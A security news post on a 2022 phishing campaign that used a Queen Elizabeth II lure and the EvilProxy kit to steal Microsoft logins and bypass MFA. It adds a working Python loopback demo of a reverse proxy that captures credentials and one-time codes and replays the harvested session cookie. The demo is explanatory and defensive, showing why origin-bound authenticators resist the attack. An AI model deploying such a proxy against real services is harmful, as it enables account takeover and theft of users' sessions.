The attackers aim to trick recipients into visiting sites designed to steal their Microsoft account credentials and MFA codes.
The messages sent to the victims purported to be from Microsoft and invited recipients to an “artificial technology hub” in Queen Elizabeth II's honor.
Proofpoint identified a credential #phish campaign using lures related to Her Majesty Queen Elizabeth II. Messages purported to be from Microsoft and invited recipients to an “artificial technology hub” in her honor. pic.twitter.com/RCcqpgfFfX
— Threat Insight (@threatinsight) September 14, 2022
The message tells recipients that Microsoft is launching an interactive AI memory board in honor of Her Majesty Queen Elizabeth II and invites them to contribute to its creation by accessing it with their Microsoft account credentials.
Upon clicking the button embedded within the email, the recipients are redirected to the phishing landing page where they’re asked to enter their Microsoft credentials.
The phishing landing page, hxxps://auth[.]royalqueenelizabeth[.]com/?, was built with the recently discovered EvilProxy phishing kit.
EvilProxy operators use reverse-proxy and cookie-injection techniques to bypass 2FA by proxying the victim's session. Such methods were previously seen in targeted campaigns by APT and cyberespionage groups; their productization in EvilProxy, sold as a service, highlights the growth of attacks against online services and MFA mechanisms.
The first mention of EvilProxy was detected in early May 2022, when the actors running it released a demonstration video showing how it could deliver advanced phishing links intended to compromise consumer accounts at major brands such as Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex and others.
EvilProxy is built on the reverse-proxy principle. The concept is simple: the attackers lure victims to a phishing page, and the reverse proxy fetches all the legitimate content the user expects, including the real login pages, from the target site while sniffing the traffic as it passes through. This way the attackers harvest valid session cookies and no longer need to authenticate with usernames, passwords or 2FA tokens themselves.
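The flow just described, as an added example that is not part of the original post and is not code from Proofpoint, Resecurity or the EvilProxy kit: a toy login service that checks a password plus a one-time code and issues a session cookie, and a reverse proxy on the "phishing domain" that relays every request to it, copies the posted credentials and the Set-Cookie header off the wire, and then replays the cookie directly to the real service. The hostname login.example, the account alice, its password and OTP, the paths /login and /dashboard and the loopback ports are all constructed for the example.

```python
import http.client
import http.cookies
import http.server
import secrets
import threading
import urllib.parse

# Constructed test account: the password and the one-time code the victim will type.
USERS = {"alice": {"password": "hunter2", "otp": "493021"}}
SESSIONS = {}  # session token -> username, held only by the legitimate service
CAPTURED = {"creds": [], "session_tokens": []}  # what the proxy operator harvests


class LegitIdP(http.server.BaseHTTPRequestHandler):
    """Stand-in for the real login service: checks password + OTP, issues a cookie."""

    def log_message(self, *args): pass  # keep the demo quiet

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        form = dict(urllib.parse.parse_qsl(body.decode()))
        user = USERS.get(form.get("user"))
        if user and user["password"] == form.get("password") and user["otp"] == form.get("otp"):
            token = secrets.token_hex(16)
            SESSIONS[token] = form["user"]
            self.send_response(302)
            self.send_header("Set-Cookie", f"session={token}; HttpOnly; Secure")
            self.send_header("Location", "/dashboard")
        else:
            self.send_response(401)
        self.end_headers()

    def do_GET(self):
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        token = jar["session"].value if "session" in jar else None
        if self.path == "/dashboard" and token in SESSIONS:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(f"welcome {SESSIONS[token]}".encode())
        else:
            self.send_response(401)
            self.end_headers()


class EvilProxyLike(http.server.BaseHTTPRequestHandler):
    """Reverse proxy on the phishing domain: relays the genuine flow, copies secrets."""

    upstream = ("127.0.0.1", 0)  # (host, port) of the real service, set by run_demo()

    def log_message(self, *args): pass

    def _relay(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else None
        if body:  # the login form passes through in clear: user, password and OTP
            CAPTURED["creds"].append(dict(urllib.parse.parse_qsl(body.decode())))
        fwd = {k: v for k, v in self.headers.items() if k in ("Cookie", "Content-Type")}
        fwd["Host"] = "login.example"  # assumed hostname of the real service
        conn = http.client.HTTPConnection(*self.upstream)
        conn.request(self.command, self.path, body, fwd)
        resp = conn.getresponse()
        data = resp.read()
        self.send_response(resp.status)
        for name, value in resp.getheaders():
            if name.lower() == "set-cookie":  # harvest the freshly minted session
                CAPTURED["session_tokens"].append(value.split(";", 1)[0].split("=", 1)[1])
            if name.lower() not in ("content-length", "transfer-encoding"):
                self.send_header(name, value)  # the cookie also reaches the victim: no alarm
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    do_GET = do_POST = _relay


def _serve(handler):
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)  # ephemeral loopback port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    idp = _serve(LegitIdP)
    EvilProxyLike.upstream = idp.server_address
    proxy = _serve(EvilProxyLike)
    # 1. The victim follows the lure and logs in, with a correct OTP, via the proxy.
    victim = http.client.HTTPConnection(*proxy.server_address)
    victim.request("POST", "/login",
                   urllib.parse.urlencode({"user": "alice", "password": "hunter2", "otp": "493021"}),
                   {"Content-Type": "application/x-www-form-urlencoded"})
    victim_status = victim.getresponse().status
    # 2. The operator replays the harvested cookie straight to the real service;
    #    no password and no second factor are needed any more.
    attacker = http.client.HTTPConnection(*idp.server_address)
    attacker.request("GET", "/dashboard",
                     headers={"Cookie": f"session={CAPTURED['session_tokens'][-1]}"})
    replay = attacker.getresponse()
    result = {"victim_status": victim_status, "captured_creds": CAPTURED["creds"][-1],
              "replay_status": replay.status, "replay_body": replay.read().decode()}
    for srv in (idp, proxy):
        srv.shutdown()
        srv.server_close()
    return result
```

Calling run_demo() returns the victim's 302, the captured user/password/OTP and a 200 "welcome alice" for the replayed cookie: the one-time code was consumed by the genuine login, so the second factor is not bypassed cryptographically, it is simply relayed, and what the operator keeps is the post-MFA session. That is why origin-bound authenticators (FIDO2/WebAuthn), which sign the domain the browser actually connected to, fail closed against this proxy, while OTP and push-based MFA do not.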
-Prameet